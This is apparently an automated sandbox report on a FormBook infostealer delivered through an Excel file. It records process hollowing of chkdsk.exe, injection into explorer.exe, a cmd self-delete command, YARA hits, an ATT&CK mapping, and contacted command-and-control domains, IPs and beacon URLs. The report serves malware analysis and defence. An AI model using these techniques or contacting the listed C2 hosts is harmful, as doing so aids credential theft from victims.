Source: C:\Users\Public\vbc.exe

Code function: 6_2_00409B10 LdrLoadDll,

6_2_00409B10

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00840080 mov ecx, dword ptr fs:[00000030h]	6_2_00840080
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008400EA mov eax, dword ptr fs:[00000030h]	6_2_008400EA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008626F8 mov eax, dword ptr fs:[00000030h]	6_2_008626F8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025826F8 mov eax, dword ptr fs:[00000030h]	8_2_025826F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 199.34.228.73 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 94.73.146.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 54.254.26.94 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 1388	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 330000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: explorer.exe, 00000007.00000002.2370890876.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000002.2370890876.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2176510697.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.2370890876.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading111	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol23	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information31	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing2	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NEW 01 13 2021.xlsx	30%	Virustotal		Browse
NEW 01 13 2021.xlsx	22%	ReversingLabs	Document-Office.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
www.acdfr.com	4%	Virustotal	Browse
td-balancer-euw2-6-109.wixdns.net	0%	Virustotal	Browse
h2oturkiye.com	5%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.tuvandadayvitos24h.online/bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf-	0%	Avira URL Cloud	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.acdfr.com/bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf-	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/	0%	Avira URL Cloud	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/favicon.ico	0%	URL Reputation	safe
http://p.zhongsou.com/favicon.ico	0%	Avira URL Cloud	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.acdfr.com	199.34.228.73	true	true	4%, Virustotal, Browse	unknown
ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com	54.254.26.94	true	false		high
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	true	0%, Virustotal, Browse	unknown
h2oturkiye.com	94.73.146.42	true	true	5%, Virustotal, Browse	unknown
www.yjpps.com	0.0.0.0	true	false		unknown
gdsjgf.com	34.102.136.180	true	true		unknown
www.h2oturkiye.com	unknown	unknown	true		unknown
www.tuvandadayvitos24h.online	unknown	unknown	true		unknown
www.gdsjgf.com	unknown	unknown	true		unknown
www.thepoetrictedstudio.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.tuvandadayvitos24h.online/bw82/?UL0xqd7P=sK11/UrgtMzQflpEedkgmoVeFVcc0msB321R1Y3hRRerJh2xMoF4SxMycrpUJoIBhj5xCA==&CXi4A=gXrXRfH0yDoHcf-	true	Avira URL Cloud: safe	unknown
http://www.acdfr.com/bw82/?UL0xqd7P=34+qQ3LqqVk48isaIqrMS1QrJzDj13fhTkCMqePtkuCvgsCPLavUD/B/pRUk8yv0QOLVfQ==&CXi4A=gXrXRfH0yDoHcf-	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.sogou.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://msk.afisha.ru/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000007.00000000.2191880997.000000000861C000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp	false		high
http://search.espn.go.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
